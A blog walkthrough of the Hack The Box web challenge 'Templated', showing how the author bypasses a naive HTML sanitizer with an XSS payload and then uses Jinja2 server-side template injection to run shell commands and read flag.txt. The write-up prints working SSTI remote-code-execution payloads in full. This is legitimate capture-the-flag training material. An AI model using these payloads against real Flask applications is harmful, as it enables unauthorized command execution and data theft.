DEV Community

Cover image for Hack The Box: Templated
Souvik Kar Mahapatra
Souvik Kar Mahapatra

Posted on • Updated on • Originally published at souvikinator.netlify.app

Hack The Box: Templated

templated

The second challenge under the web and most of the votes are for easy. Let's try it out.

CHALLENGE TITLE: Templated

CHALLENGE DESCRIPTION: Can you exploit this simple mistake?

I don't know what's the mistake is, so let's find out. You'll notice "Proudly powered by Flask/Jinja2" implying it's built using Flask/Jinja2, not sure whether it's useful or not.

If you inspect elements or use the network tab in the dev tool, you'll not find anything. However we do have a URL, we can try different URL paths to see how it responds.

I'll go for http://134.209.16.184:32694/xyz and we get a 404 error but notice what we entered as the path in URL is getting rendered in the website. Let's try out few payloads for XSS.

If you try <h1>hello</h1> you'll be redirected to a Not Found page different from the previous 404 page. Weird! as soon as we pass HTML we get redirected to the Not Found page, there must be some sort of sanitization going on. Time to figure how this sanitizer works!

figure out

Payload 1: <h1></h1>
Result: redirects to Not Found Page

Payload 2: </h1>
Result: redirects to Not Found Page

Payload 3: <h1>
Result: works!! Renders.

Looks like the sanitizer only looks for closing HTML tag or to be more specific, it looks for </.
Why did Payload 3 works?? because it <h1> does not contain </ and also in HTML5 if any HTML element is missing a closing tag then the browser automatically adds the closing tag while rendering.

Thanks Browser!!

I guess we have to pop an alert to get the flag.

Payload: <img src=x onerror="alert('xss')">

and it again works, but still, we don't have any traces of flag. Let's inspect the element to see in what form our payload ends up in the DOM.

htb-web-chal-2-inspect.png

Ever heard of <str>?? I have never

google time

Oops! can't find anything useful. Maybe it is related to Flask/Jinja2. Btw Jinja2 is a web template engine for Python. The challenge title is also templated! maybe it is related to SSTI (Server Side Template Injection).

Payload 1: http://134.209.16.184:32694/{{100+100}}

Result: it gives 200 as output.

So we found two vulnerabilities. What else can be done with SSTI apart from adding numbers? Here is a good article on SSTI with Jinja2 you can refer to.

So we can use the MRO function to display classes, which will come in extremely handy for building python SSTI Jinja2 payloads.

Payload:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}
Enter fullscreen mode Exit fullscreen mode

so the URL will look something like this:

http://64.227.43.192:32601/{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}

templated-flag.png

this lists all the files and guesses what we can see flag.txt. All we need to do now is to replace ls * with cat flag.txt.

Final Payload:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read()}}
Enter fullscreen mode Exit fullscreen mode

and boom! you have the flag.

I would recommend trying running each component of the payload as an individual payload just to understand what's the output of each component.

See you on the next challenge.

"Set your goals high and don’t stop until you get there" -Bo Jackson

Discussion (0)